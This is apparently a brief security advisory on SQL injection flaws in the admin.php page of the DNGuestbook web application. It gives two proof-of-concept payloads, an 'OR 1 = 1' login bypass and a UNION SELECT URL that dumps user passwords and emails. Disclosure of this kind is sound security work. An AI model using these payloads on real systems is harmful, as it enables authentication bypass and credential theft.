Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities

Design Nation DNGuestbook Admin.PHP SQL Injection Vulnerabilities

An exploit is not required.

The following proof-of-concept examples are available:

SELECT * FROM dnguestbook_user WHERE mail='' OR 1 = 1 /* AND passwort='b0000m'

http://www.example.com/path_to_gb/admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user